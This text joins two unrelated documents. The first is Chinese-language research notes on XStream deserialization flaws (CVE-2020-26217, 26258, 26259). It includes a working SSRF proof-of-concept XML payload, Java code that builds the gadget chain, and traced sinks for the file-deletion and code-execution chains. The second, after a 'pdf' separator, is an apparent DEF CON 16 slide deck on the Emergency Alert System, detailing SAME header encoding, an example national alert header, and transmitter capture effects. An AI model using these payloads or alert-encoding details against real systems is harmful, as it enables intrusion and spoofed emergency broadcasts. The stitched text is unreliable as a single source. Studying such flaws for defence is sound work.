其中Converters是XStream中的核⼼模块,主要是负责XML到Java对象的转换,Java对象到XML数据格式的转换,XStream内置了
许多Converters,其中内置了⼀个DefaultConverters,它是使⽤反射来加载XML中指定的对象的。
Drivers是负责从“流”中直接读取并操作XML,有两个接⼝分别是HierarchicalStreamWriter 和 HierarchicalStreamReader 分别负责将
Java对象序列化到XML数据格式以及从XML数据格式反序列化到Java对象。
Context是序列化和反序列化过程中所必须的⼀个对象,它会根据操作创建MarshallingContext 或 UnmarshallingContext,相关过程
将会从对应的Context中查找对应的Converters去完成相应的转换操作。
最后介绍了⼀下XStream的外观模式
The main XStream class is typically used as the entry point. This assembles the necessary
components of XStream (as described above; Context, Converter, Writer/Reader and ClassMapper)
and provides a simple to use API for common operations.
⼆、正向分析
CVE-2020-26217
远程代码执⾏漏洞
CVE-2020-26258
服务端请求伪造漏洞
CVE-2020-26259
任意⽂件删除漏洞
@December 14, 2020 5:59 PM
XStream 安全研究笔记
2
受限于篇幅和精⼒,我们只会深度分析其中⼀个漏洞,因为漏洞都是相似的,我们会总结⼀些相似性,这样其他的漏洞也可以实现快
速理解。
我们将深度分析CVE-2020-26258(服务端请求伪造)这个漏洞,下⾯开始漏洞分析。
Proof of Concept:
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler class="com.sun.xml.internal.ws.encoding.DataSourceStreamingDataHandler">
<dataSource class="javax.activation.URLDataSource">
<url>http://127.0.0.1:1337/internal</url>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
我们将在初始化XStream对象并开启反序列化流程的的时候,不启⽤安全上下⽂,这样不会被⽩名单拦截,我们⿎励各位同学⾃⼰动
⼿调试,所以不会详细的描述每⼀次的调⽤代码,但会给出关键调⽤。
XStream.class
public Object fromXML(String xml) {
return this.fromXML((Reader)(new StringReader(xml))); <------- point
}
public Object fromXML(Reader reader) {
return this.unmarshal(this.hierarchicalStreamDriver.createReader(reader), (Object)null); <------- point
}
public Object unmarshal(HierarchicalStreamReader reader, Object root) {
return this.unmarshal(reader, root, (DataHolder)null); <------- point
}
public Object unmarshal(HierarchicalStreamReader reader, Object root, DataHolder dataHolder) {
try {
if (!this.securityInitialized && !this.securityWarningGiven) {
this.securityWarningGiven = true;
System.err.println("Security framework of XStream not explicitly initialized, using predefined black list on your own risk.
}
return this.marshallingStrategy.unmarshal(root, reader, dataHolder, this.converterLookup, this.mapper); <------- point
} catch (ConversionException var7) {
Package pkg = this.getClass().getPackage();
String version = pkg != null ? pkg.getImplementationVersion() : null;
var7.add("version", version != null ? version : "not available");
throw var7;
}
}
XStream的开发⼈员之所以使⽤上⾯的这种写法,我猜测是因为后期代码维护起来,或者说是可扩展性⽐较⽅便,毕竟做了那么多层
包装。
XStream 安全研究笔记
3
AbstractTreeMarshallingStrategy.class
public Object unmarshal(Object root, HierarchicalStreamReader reader, DataHolder dataHolder, ConverterLookup converterLookup, Mapper mapper
TreeUnmarshaller context = this.createUnmarshallingContext(root, reader, converterLookup, mapper);
return context.start(dataHolder); <------- point
}
在这⾥创建了UnmarshallingContext,⽤于反序列化过程中,查找对应的converters,来实现数据格式的转换。
TreeUnmarshaller.class
public Object start(DataHolder dataHolder) {
this.dataHolder = dataHolder;
Class type = HierarchicalStreams.readClassType(this.reader, this.mapper);
Object result = this.convertAnother((Object)null, type); <------- point
Iterator validations = this.validationList.iterator();
while(validations.hasNext()) {
Runnable runnable = (Runnable)validations.next();
runnable.run();
}
return result;
}
通过⽤对应的converters完成对应的数据格式转换。
TreeUnmarshaller.class
public Object convertAnother(Object parent, Class type) {
return this.convertAnother(parent, type, (Converter)null); <------- point
}
public Object convertAnother(Object parent, Class type, Converter converter) {
type = this.mapper.defaultImplementationOf(type);
if (converter == null) {
converter = this.converterLookup.lookupConverterForType(type);
} else if (!converter.canConvert(type)) {
ConversionException e = new ConversionException("Explicit selected converter cannot handle type");
e.add("item-type", type.getName());
e.add("converter-type", converter.getClass().getName());
throw e;
}
return this.convert(parent, type, converter); <------- point
}
AbstractReferenceUnmarshaller.class
protected Object convert(Object parent, Class type, Converter converter) {
Object result;
if (this.parentStack.size() > 0) {
result = this.parentStack.peek();
XStream 安全研究笔记
4
if (result != null && !this.values.containsKey(result)) {
this.values.put(result, parent);
}
}
String attributeName = this.getMapper().aliasForSystemAttribute("reference");
String reference = attributeName == null ? null : this.reader.getAttribute(attributeName);
boolean isReferenceable = this.getMapper().isReferenceable(type);
Object currentReferenceKey;
if (reference != null) {
currentReferenceKey = isReferenceable ? this.values.get(this.getReferenceKey(reference)) : null;
if (currentReferenceKey == null) {
ConversionException ex = new ConversionException("Invalid reference");
ex.add("reference", reference);
ex.add("referenced-type", type.getName());
ex.add("referenceable", Boolean.toString(isReferenceable));
throw ex;
}
result = currentReferenceKey == NULL ? null : currentReferenceKey;
} else if (!isReferenceable) {
result = super.convert(parent, type, converter);
} else {
currentReferenceKey = this.getCurrentReferenceKey();
this.parentStack.push(currentReferenceKey);
Object localResult = null;
try {
localResult = super.convert(parent, type, converter); <------- point
} finally {
result = localResult;
if (currentReferenceKey != null) {
this.values.put(currentReferenceKey, localResult == null ? NULL : localResult);
}
this.parentStack.popSilently();
}
}
return result;
}
TreeUnmarshaller.class
protected Object convert(Object parent, Class type, Converter converter) {
this.types.push(type);
Object var4;
try {
var4 = converter.unmarshal(this.reader, this); <------- point
} catch (ConversionException var10) {
this.addInformationTo(var10, type, converter, parent);
throw var10;
} catch (RuntimeException var11) {
ConversionException conversionException = new ConversionException(var11);
this.addInformationTo(conversionException, type, converter, parent);
throw conversionException;
} finally {
this.types.popSilently();
}
return var4;
}
XStream 安全研究笔记
5
MapConverter.class
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
Map map = (Map)this.createCollection(context.getRequiredType());
this.populateMap(reader, context, map); <------- point
return map;
}
值得注意的是,
Map map = (Map)this.createCollection(context.getRequiredType());
这⾏代码将⾸先根据XML数据格式中的<map>反射创建java.util.Map对象
AbstractCollectionConverter.class
protected Object createCollection(Class type) {
ErrorWritingException ex = null;
Class defaultType = this.mapper().defaultImplementationOf(type);
try {
return defaultType.newInstance(); <------- point
} catch (InstantiationException var5) {
ex = new ConversionException("Cannot instantiate default collection", var5);
} catch (IllegalAccessException var6) {
ex = new ObjectAccessException("Cannot instantiate default collection", var6);
}
((ErrorWritingException)ex).add("collection-type", type.getName());
((ErrorWritingException)ex).add("default-type", defaultType.getName());
throw ex;
}
接着开始在populateMap⽅法中反序列化Map中的KV对。
MapConverter.class
protected void populateMap(HierarchicalStreamReader reader, UnmarshallingContext context, Map map) {
this.populateMap(reader, context, map, map); <------- point
}
protected void populateMap(HierarchicalStreamReader reader, UnmarshallingContext context, Map map, Map target) {
while(reader.hasMoreChildren()) {
reader.moveDown();
this.putCurrentEntryIntoMap(reader, context, map, target); <------- point
reader.moveUp();
}
}
protected void putCurrentEntryIntoMap(HierarchicalStreamReader reader, UnmarshallingContext context, Map map, Map target) {
Object key = this.readCompleteItem(reader, context, map);
Object value = this.readCompleteItem(reader, context, map);
target.put(key, value); <------- sink
}
在跟⼊sink点之前,先看看XStream如何反序列化获得KV对的内容。
XStream 安全研究笔记
6
AbstractCollectionConverter.class
protected Object readCompleteItem(HierarchicalStreamReader reader, UnmarshallingContext context, Object current) {
reader.moveDown();
Object result = this.readItem(reader, context, current); <------- point
reader.moveUp();
return result;
}
protected Object readItem(HierarchicalStreamReader reader, UnmarshallingContext context, Object current) {
return this.readBareItem(reader, context, current); <------- point
}
protected Object readBareItem(HierarchicalStreamReader reader, UnmarshallingContext context, Object current) {
Class type = HierarchicalStreams.readClassType(reader, this.mapper()); <------- point
return context.convertAnother(current, type);
}
HierarchicalStreams.class
public static Class readClassType(HierarchicalStreamReader reader, Mapper mapper) {
String classAttribute = readClassAttribute(reader, mapper);
Class type;
if (classAttribute == null) {
type = mapper.realClass(reader.getNodeName()); <------- point
} else {
type = mapper.realClass(classAttribute);
}
return type;
}
CachingMapper.class
public Class realClass(String elementName) {
Object cached = this.realClassCache.get(elementName);
if (cached != null) {
if (cached instanceof Class) {
return (Class)cached;
} else {
throw (XStreamException)cached;
}
} else {
try {
Class result = super.realClass(elementName); <------- point
this.realClassCache.put(elementName, result);
return result;
} catch (ForbiddenClassException var4) {
this.realClassCache.put(elementName, var4);
throw var4;
} catch (CannotResolveClassException var5) {
this.realClassCache.put(elementName, var5);
throw var5;
}
}
}
可以从代码看到,如果缓存中没有就交给⽗类(MapperWrapper)继续查找converters去完成数据转换。
MapperWrapper.class
public Class realClass(String elementName) {
return this.realClassMapper.realClass(elementName); <------- point
}
SecurityMapper.class
XStream 安全研究笔记
7
public Class realClass(String elementName) {
Class type = super.realClass(elementName); <------- point
for(int i = 0; i < this.permissions.size(); ++i) {
TypePermission permission = (TypePermission)this.permissions.get(i);
if (permission.allows(type)) {
return type;
}
}
throw new ForbiddenClassException(type);
}
......
DefaultMapper.class
public Class realClass(String elementName) {
Class resultingClass = Primitives.primitiveType(elementName);
if (resultingClass != null) {
return resultingClass;
} else {
try {
boolean initialize = true;
ClassLoader classLoader;
if (elementName.startsWith(XSTREAM_PACKAGE_ROOT)) {
classLoader = DefaultMapper.class.getClassLoader();
} else {
classLoader = this.classLoaderReference.getReference();
initialize = elementName.charAt(0) == '[';
}
return Class.forName(elementName, initialize, classLoader); <------- point
} catch (ClassNotFoundException var5) {
throw new CannotResolveClassException(elementName);
}
}
}
这⼀块的调⽤栈如下:
XStream 安全研究笔记
8
⾄此,jdk.nashorn.internal.objects.NativeString 通过Java反射完成初始化,初始化完成后,会被加⼊到缓存,下⼀次的反序列化会直
接从缓存取,不会再次调⽤Java反射API初始化。接着会调⽤HashMap.put() 进⼊sink点,触发类是NativeString。
MapConverter.class
protected void putCurrentEntryIntoMap(HierarchicalStreamReader reader, UnmarshallingContext context, Map map, Map target) {
Object key = this.readCompleteItem(reader, context, map);
Object value = this.readCompleteItem(reader, context, map);
target.put(key, value); <------- sink
}
Map.class
public V put(K key, V value) {
return putVal(hash(key), key, value, false, true); <------- point
}
HashMap.class
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode() <------- point ) ^ (h >>> 16);
}
NativeString.class
public int hashCode() {
return this.getStringValue().hashCode(); <------- point
}
private String getStringValue() {
return this.value instanceof String ? (String)this.value : this.value.toString(); <------- point
}
XStream 安全研究笔记
9
Base64Data.class
public String toString() {
this.get(); <------- point
return DatatypeConverterImpl._printBase64Binary(this.data, 0, this.dataLen);
}
public byte[] get() {
if (this.data == null) {
try {
ByteArrayOutputStreamEx baos = new ByteArrayOutputStreamEx(1024);
InputStream is = this.dataHandler.getDataSource().getInputStream(); <------- point
baos.readFrom(is);
is.close();
this.data = baos.getBuffer();
this.dataLen = baos.size();
} catch (IOException var3) {
this.dataLen = 0;
}
}
return this.data;
}
URLDataSource.class
public InputStream getInputStream() throws IOException {
return this.url.openStream(); <------- point
}
⼩结:
攻击者通过构造特殊的XML数据,将数据传递到XStream组件,当数据进⼊XStream组件的⼀瞬间,通过XStream组件的代码成功的
污染了Map的KV对数据类型,由于控制了数据类型就控制了代码执⾏路径,这个过程将导致数据流可控,最终实现攻击者的需求。
三、反向分析
由于XStream官⽅已经给出了对应的POC代码,当我调试分析完成之后,我开始想如果我是漏洞挖掘的⼈,我该怎么构造这个POC。
⾸先可以确定的是触发类NativeString是包含在Map中的,所以先定义⼀个Map
Map map = new HashMap();
在触发类NativeString可以看到包含了Base64Data对象和URLDataSource对象,⽽Base64Data对象包含了URLDataSource对象,所
以完成如下定义
Base64Data base64Data = new Base64Data();
javax.activation.URLDataSource urlDataSource = new javax.activation.URLDataSource(new URL("http://127.0.0.1:1337/internal"));
DataSourceStreamingDataHandler handler = new DataSourceStreamingDataHandler(urlDataSource);
base64Data.set(handler);
最后需要实例化NativeString对象并把Base64Data对象放进去
Class nativeString_Class1 = Class.forName("jdk.nashorn.internal.objects.NativeString");
Constructor objCons = Object.class.getDeclaredConstructor(new Class[0]);
objCons.setAccessible(true);
XStream 安全研究笔记
10
Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(nativeString_Class1, objCons);
sc.setAccessible(true);
Object nativeString_Object = sc.newInstance(new Object[0]);
Field nativeStringValueField = nativeString_Object.getClass().getDeclaredField("value");
nativeStringValueField.setAccessible(true);
nativeStringValueField.set(nativeString_Object, base64Data);
最后把NativeString对象放到Map中
Map map = new HashMap();
map.put(nativeString_Object, nativeString_Object);
map.put(nativeString_Object, nativeString_Object);
所以完整的代码如下:
Base64Data base64Data = new Base64Data();
javax.activation.URLDataSource urlDataSource = new javax.activation.URLDataSource(new URL("http://127.0.0.1:1337/internal"));
DataSourceStreamingDataHandler handler = new DataSourceStreamingDataHandler(urlDataSource);
base64Data.set(handler);
Class nativeString_Class1 = Class.forName("jdk.nashorn.internal.objects.NativeString");
Constructor objCons = Object.class.getDeclaredConstructor(new Class[0]);
objCons.setAccessible(true);
Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(nativeString_Class1, objCons);
sc.setAccessible(true);
Object nativeString_Object = sc.newInstance(new Object[0]);
Field nativeStringValueField = nativeString_Object.getClass().getDeclaredField("value");
nativeStringValueField.setAccessible(true);
nativeStringValueField.set(nativeString_Object, base64Data);
Map map = new HashMap();
map.put(nativeString_Object, nativeString_Object);
map.put(nativeString_Object, nativeString_Object);
XStream xStream = new XStream();
String test = xStream.toXML(map);
System.out.println(
test
);
值得注意的是通过使⽤newConstructorForSerialization⽅法可以实现反射实例化⼀个没有构造⽅法或者构造⽅法为private修饰的类。
三、任意⽂件删除漏洞 CVE-2020-26259
这个漏洞也是通过NativeString触发的,通过XML污染InputStream的类型,导致后续XStream代码流程执⾏到is.close()的时候,实现
触发。
public byte[] get() {
if (this.data == null) {
try {
ByteArrayOutputStreamEx baos = new ByteArrayOutputStreamEx(1024);
XStream 安全研究笔记
11
InputStream is = this.dataHandler.getDataSource().getInputStream();
baos.readFrom(is);
is.close(); <------- sink
this.data = baos.getBuffer();
this.dataLen = baos.size();
} catch (IOException var3) {
this.dataLen = 0;
}
}
return this.data;
}
通过将Base64Data.get()的InputStream is 数据类型污染为com.sun.xml.internal.ws.util.ReadAllStream$FileStream 类型,当执⾏到
is.close()的时候将完成触发。
private static class FileStream extends InputStream {
@Nullable
private File tempFile;
@Nullable
private FileInputStream fin;
private FileStream() {
}
void readAll(InputStream in) throws IOException {
this.tempFile = File.createTempFile("jaxws", ".bin");
FileOutputStream fileOut = new FileOutputStream(this.tempFile);
try {
byte[] buf = new byte[8192];
int len;
while((len = in.read(buf)) != -1) {
fileOut.write(buf, 0, len);
}
} finally {
fileOut.close();
}
this.fin = new FileInputStream(this.tempFile);
}
public int read() throws IOException {
return this.fin != null ? this.fin.read() : -1;
}
public int read(byte[] b, int off, int sz) throws IOException {
return this.fin != null ? this.fin.read(b, off, sz) : -1;
}
XStream 安全研究笔记
12
public void close() throws IOException {
if (this.fin != null) {
this.fin.close();
}
if (this.tempFile != null) {
boolean success = this.tempFile.delete(); <------- sink
if (!success) {
ReadAllStream.LOGGER.log(Level.INFO, "File {0} could not be deleted", this.tempFile);
}
}
}
}
四、远程代码执⾏漏洞 CVE-2020-26217
这个链条还是⽤NativeString触发,只不过这个链条⽐较⻓,⼀步步的看。
⾸先污染DataHandle的类型为com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource,在Base64Data.get()⽅法将
InputStream is 污染为java.io.SequenceInputStream。
由于is已经被污染为java.io.SequenceInputStream类型,所以在ByteArrayOutputStreamEx.readFrom()⽅法
ByteArrayOutputStreamEx.class
public void readFrom(InputStream is) throws IOException {
while(true) {
if (this.count == this.buf.length) {
byte[] data = new byte[this.buf.length * 2];
System.arraycopy(this.buf, 0, data, 0, this.buf.length);
this.buf = data;
}
int sz = is.read(this.buf, this.count, this.buf.length - this.count); <------- point
if (sz < 0) {
return;
}
this.count += sz;
}
}
会执⾏java.io.SequenceInputStream.read()⽅法
SequenceInputStream.class
public int read(byte b[], int off, int len) throws IOException {
if (in == null) {
return -1;
} else if (b == null) {
throw new NullPointerException();
} else if (off < 0 || len < 0 || len > b.length - off) {
throw new IndexOutOfBoundsException();
} else if (len == 0) {
return 0;
}
int n = in.read(b, off, len);
if (n <= 0) {
nextStream(); <------- point
return read(b, off, len);
}
XStream 安全研究笔记
13
return n;
}
final void nextStream() throws IOException {
if (in != null) {
in.close();
}
if (e.hasMoreElements()) {
in = (InputStream) e.nextElement(); <------- point
if (in == null)
throw new NullPointerException();
}
else in = null;
}
javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator$Type.class
public Object nextElement() {
switch (type) {
case KEYS: return iterator.next().getKey(); <------- point
case ELEMENTS: return iterator.next().getValue();
default: return null;
}
}
FilterIterator.class
public T next() {
if (next == null) {
throw new NoSuchElementException();
}
T o = next;
advance(); <------- point
return o;
}
ServiceRegistry.class
private void advance() {
while (iter.hasNext()) {
T elt = iter.next();
if (filter.filter(elt)) { <------- sink
next = elt;
return;
}
}
next = null;
}
这⾥给出完整的调⽤栈
XStream 安全研究笔记
14
这个洞⽐较有意思的地⽅是outer-class这个别名,可以看到ArrayList$Itr 并没有outer-class这个属性。
Exception in thread "main" java.lang.NoSuchFieldException: outer-class
at java.lang.Class.getDeclaredField(Class.java:2057)
at XstreamEXP.main(XstreamEXP.java:147)
但是通过反射可以获取⼀个this$0的内部类属性
cursor
lastRet
expectedModCount
this$0
XStream对这个this$0的内部类属性有⼀个别名映射关系,是通过OuterClassMapper建⽴的
/*
* Copyright (C) 2005 Joe Walnes.
* Copyright (C) 2006, 2007, 2009, 2015 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
* style license a copy of which has been included with this distribution in
* the LICENSE.txt file.
*
* Created on 31. January 2005 by Joe Walnes
*/
package com.thoughtworks.xstream.mapper;
XStream 安全研究笔记
15
import java.lang.reflect.Field;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;
import com.thoughtworks.xstream.core.Caching;
/**
* Mapper that uses a more meaningful alias for the field in an inner class (this$0) that refers to the outer class.
*
* @author Joe Walnes
*/
public class OuterClassMapper extends MapperWrapper implements Caching {
private static final String[] EMPTY_NAMES = new String[0];
private final String alias;
private final Map innerFields;
public OuterClassMapper(Mapper wrapped) {
this(wrapped, "outer-class");
}
public OuterClassMapper(Mapper wrapped, String alias) {
super(wrapped);
this.alias = alias;
innerFields = Collections.synchronizedMap(new HashMap());
innerFields.put(Object.class.getName(), EMPTY_NAMES);
}
public String serializedMember(Class type, String memberName) {
if (memberName.startsWith("this$")) {
final String[] innerFieldNames = getInnerFieldNames(type);
for (int i = 0; i < innerFieldNames.length; ++i) {
if (innerFieldNames[i].equals(memberName)) {
return i == 0 ? alias : alias + '-' + i;
}
}
}
return super.serializedMember(type, memberName);
}
public String realMember(Class type, String serialized) {
if (serialized.startsWith(alias)) {
int idx = -1;
final int len = alias.length();
if (len == serialized.length()) {
idx = 0;
} else if (serialized.length() > len + 1 && serialized.charAt(len) == '-') {
idx = Integer.valueOf(serialized.substring(len + 1)).intValue();
}
if (idx >= 0) {
final String[] innerFieldNames = getInnerFieldNames(type);
if (idx < innerFieldNames.length) {
return innerFieldNames[idx];
}
}
}
return super.realMember(type, serialized);
}
private String[] getInnerFieldNames(final Class type) {
String[] innerFieldNames = (String[])innerFields.get(type.getName());
if (innerFieldNames == null) {
innerFieldNames = getInnerFieldNames(type.getSuperclass());
Field[] declaredFields = type.getDeclaredFields();
for (int i = 0; i < declaredFields.length; i++) {
final Field field = declaredFields[i];
if (field.getName().startsWith("this$")) {
String[] temp = new String[innerFieldNames.length+1];
System.arraycopy(innerFieldNames, 0, temp, 0, innerFieldNames.length);
innerFieldNames = temp;
innerFieldNames[innerFieldNames.length - 1] = field.getName();
}
}
innerFields.put(type.getName(), innerFieldNames);
}
return innerFieldNames;
}
XStream 安全研究笔记
16
public void flushCache() {
innerFields.keySet().retainAll(Collections.singletonList(Object.class.getName()));
}
}
这就解释了outer-class标签是如何出现的
总结:
寻找这类漏洞需要⼤量的时间,此类组件出现的安全问题均可以通过传递数据实现代码执⾏。
Reference:
http://xstream.10960.n7.nabble.com/How-to-remove-the-quot-outer-class-quot-tags-td5105.html
https://x-stream.github.io/javadoc/com/thoughtworks/xstream/mapper/OuterClassMapper.html
http://x-stream.github.io/CVE-2020-26258.html
http://x-stream.github.io/converters.html
https://x-stream.github.io/CVE-2020-26259.html
https://x-stream.github.io/CVE-2020-26217.html
https://x-stream.github.io/security.html | pdf |
FluX on: E.A.S.
(Emergency Alert System)
Presented By:
Matt Krick, “DCFluX”
Chief Engineer, New West Broadcasting Systems, Inc.
DEF CON 16
Las Vegas, NV
Track 2, 12:00-12:50, Saturday, August 9, 2008
WARNING:
Shut down all transmitters with active
microphones in the room.
Do not re-transmit ‘Hot’ audio.
Saturday Night Live, TV Funhouse, Fun With Real Audio ©1997 by NBC, Inc.
About the Author
• Matt Krick
• “DCFluX”
• Video Editor
• Broadcast Engineer
– 1998 to Present
• K3MK
– Licensed to
Transmit, 1994 to
Present
Video Advantage ©2002 by Media Concepts, Inc.
Warning Systems
1. CONELRAD
2. EBS
3. EAS
4. EAS: The Next Generation
1. CONtrol of ELectromagnetic RADiation
• 1951 - 1963
• All FM, TV and most AM stations sign-off
• Some AM stations required to broadcast
on 640 kHz or 1240 kHz
• All radios marked with CONELRAD
indicators on frequency dials
• Carrier on and off in 5 second intervals
– 1000 Hz alert tone for 20 - 25 seconds
1. CONtrol of ELectromagnetic RADiation
Photo by: Trevor Paglen
Department of Geography, University of California at Berkeley
1. CONtrol of ELectromagnetic RADiation
• CONELRAD Stress Test
– Transmitter power supply failure
– Local electrical substation failure
– Transmitter output network failure
– Transmitter carrier tube failure
– Transmitter modulator tube failure
• 1963 - 1997
• Introduction of ‘Two-Tone’ alert
– 853 & 960 Hz for 20 - 25 seconds
• Required 24 / 7 manned stations to
relay alerts
2. Emergency Broadcast System
2. Emergency Broadcast System
• EBS Stress Test
– Transmitter power supply failure
– Local electrical substation failure
– Transmitter modulator tube failure
3. Emergency Alert System
• 1997 - Present (1994)
• Administered by FEMA, FCC & NOAA
• Introduction of “SAME” encoded digital
message headers
– EAS uses 853 & 960 Hz Alert Tone
– SAME uses 1050 Hz Alert Tone
• Fully automated
3. Emergency Alert System
• Emergency Action Notification (EAN)
• Emergency Action Termination (EAT)
• National Information Center (NIC)
• National Periodic Test (NPT)
• NOAA Weather Alerts
• AMBER Alert (CAE)
• Local Emergencies
3. Emergency Alert System
• Participating Stations
– (-AM), (-FM), (-TV), (-DT)
– Class A TV (-CA)
– LPTV (-LP) if originating
– LPFM (-LP) if originating
– Cable TV
– Satellite DBS TV (National Only)
– XM, Sirius Satellite Radio (National Only)
* FCC Rules, Part 11.11
3. Emergency Alert System
• Non Participating Stations
– Sign off during alert
• Exempt Stations
– LPTV Translators
– LPFM Translators
* FCC Rules, Part 11.11, Part 11.19
Harris / SAGE EAS ENDEC
• AMD 80C188
• ADSP-2115
• 6 Receivers
• 6 Com Ports
• AFSK Encode
• AFSK Decode
• Computer I/O
http://www.broadcast.harris.com/support/sage/
EAS Protocol
Header
(3 Times)
Attention
Signal
EOM
(3 Times)
[PREAMBLE]
ZCZC-
ORG-
EEE-
PSSCCC
+TTTT-
JJJHHMM-
LLLLLLLL-
1 sec. pause
Message
853 & 960 Hz
8 - 25 sec.
Transmission
of audio,
video or text
messages
120 sec.
1 sec. pause
[PREAMBLE]
NNNN
1 sec. pause
* FCC Rules, Part 11.31(c), Part 11.33(a)(3)
[PREAMBLE]
This is a consecutive string of bits
(sixteen bytes of AB hexadecimal [8
bit byte 10101011]) sent to clear the
system, set AGC and set
asynchronous decoder clocking
cycles. The preamble must be
transmitted before each header and
End Of Message code.
* FCC Rules, Part 11.31(c)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
ZCZC-
This is the identifier, sent as ASCII
characters ZCZC to indicate the start
of ASCII code.
* FCC Rules, Part 11.31(c)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
ORG-
This is the Originator code and
indicates who originally initiated the
activation of the EAS.
EAN - Emergency Action Network
PEP - Primary Entry Point System
CIV - Civil authorities
WXR - National Weather Service
EAS - EAS Participant
* FCC Rules, Part 11.31(c), Part 11.31(d)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
EEE-
This is the Event code and indicates
the nature of the EAS activation. The
Event codes must be compatible
with the codes used by the NWS
Weather Radio Specific Area
Message Encoder (WRSAME).
EAN - Emergency Action Notification
EAT - Emergency Action Termination
* FCC Rules, Part 11.31(c), Part 11.31(e)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
PSSCCC
This is the Location code and indicates
the geographic area affected by the
EAS alert. There may be up to 31
Location codes in an EAS alert.
P defines County Subdivisions
SS defines State
CCC defines Individual Counties or
Cities
* FCC Rules, Part 11.31(c), Part 11.31(f)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
+TTTT-
This indicates the valid time period of a
message in 15 minute segments up
to one hour and then in 30 minute
segments beyond one hour; i.e.,
+0015, +0030, +0045, +0100, +0430
and +0600. Up to +9930.
* FCC Rules, Part 11.31(c)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
JJJHHMM-
This is the day in Julian Calendar days
(JJJ) of the year and the time in
hours and minutes (HHMM) when
the message was initially released
by the originator using 24 hour
Universal Coordinated Time (UTC).
* FCC Rules, Part 11.31(c)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
LLLLLLLL-
This is the identification of the EAS
Participant, NWS office, etc.,
transmitting or retransmitting the
message. These codes will be
automatically affixed to all outgoing
messages by the EAS encoder.
Use WOPR/JR, not WOPR-JR
* FCC Rules, Part 11.31(c), Part 11.31(3)(b)
[PREAMBLE]ZCZC-ORG-EEE-PSSCCC+TTTT-JJJHHMM-LLLLLLLL-
NNNN
This is the End of Message (EOM)
code sent as a string of four ASCII N
characters.
* FCC Rules, Part 11.31(c)
[PREAMBLE]NNNN
Example EAN
[PREAMBLE]
ZCZC-
PEP- (Primary Entry Point)
EAN- (Emergency Action Notification)
011000 (All of District of Columbia)
+2400- (Valid for 24 Hours)
2220000- (Day 222 00:00 HRS)
POTUS -
* FCC Rules, Part 11.31(c)
Modulation Standards
8, N, 0
Any
Any
Serial Format
853 and 960 Hz
None
None
Attention Signal
3.333 mS
1270 Hz (2225)
1070 Hz (2025)
300 BPS
ASCII
AFSK
BELL 103
AFSK
AFSK
Technique
0.833 mS
2200 Hz
1200 Hz
1200 BPS
ASCII
BELL 202
2083.3 Hz
Mark Tone
1562.5 Hz
Space Tone
1.92 mS
Spacing Time
520.83 BPS
Baud Rate
7 bit ASCII
Characters
EAS *
* FCC Rules, Part 11.31(a)(1)
Crystal Division Ratios
18757 and 16667 23447 and 20833
4689 and 4167
853 and 960 Hz
7680
1920
2560
7680
4.0 MHz
30720
7680
10240
30720
16.0 MHz
9600
2083.3 Hz
12800
1562.5 Hz
38400
1.92 mS
38400
520.83 BPS
20.0 MHz
Byonics TinyTrak4
• ATMEGA644P
• 20 MHz Clock
• TX Control
• AFSK Encode
• AFSK Decode
• Computer I/O
• Optional LCD
http://www.byonics.com/tinytrak4/
Local Station Monitoring
SAGE ENDEC
National
Weather
Service
LP2
LP1
Local Primary 1 (LP1) Monitoring
SAGE ENDEC
State
PBS
National
Weather
Service
Local
Sheriff
LP2
Army
National
Guard
National
Warning
Center
Check your local listings
EAS plans contain guidelines which must
be followed to activate the EAS.
The plans include the EAS header codes
and messages that will be transmitted by
key EAS sources.
State and local plans also contain unique
methods of EAS message distribution.
* FCC Rules, Part 11.21
http://www.fcc.gov/pshs/services/eas/chairs.htm
National Primary, Tier 1
• 34 NP Tier 1 stations
– Diesel backup generator, 30 days fuel
– Landline, Satellite and HF radio
connectivity to FEMA operation centers
– Special EAS ENDEC with unique codes
– Located just outside of major city area
– Fallout shelter with on-site food
– Special lightning protection
National Primary, Tier 2
• 3 PEP Tier 2 stations
– All Tier 1 requirements except fallout
shelter
• 24 additional Tier 2 stations planned
National Primary, Tier 3
• Direct EAS link from FEMA to Public
Radio satellite network
• Direct EAS link from FEMA to XM
Radio satellite network
– XM Radio receivers being added to all
Tier 1 and 2 stations
• No special provisions like Tier 1 & 2
FM Capture Effect
• Signal =>15 dB captures receiver,
>20 dB preferred
• <15 dB of separation and signals
‘Fight’
• AM and SSB Signals ‘Mix’
Total Power Output
250W–50kW
(+77 dBmW)
250W – 1kW
(+60 dBmW)
250W–50kW
(+77 dBmW)
10kW–50kW
(+77 dBmW)
AM
<= 150kW
(+82 dBmW)
100W
(+50 dBmW)
<= 6kW
(+68 dBmW)
Class A
10W
(+40 dBmW)
<= 100kW
(+80 dBmW)
<= 50kW
(+77 dBmW)
FM
<= 150kW
(+82 dBmW)
N/A
Class D
<= 5MW
(+97 dBmW)
1000W
(+60 dBmW)
Class C
N/A
<= 500W
(+57 dBmW)
Class B
TV
VHF
Free Space Attenuation
128 dB
116 dB
112 dB
74 dB
64 Miles
134 dB
122 dB
118 dB
80 dB
128 Miles
68 dB
62 dB
56 dB
50 dB
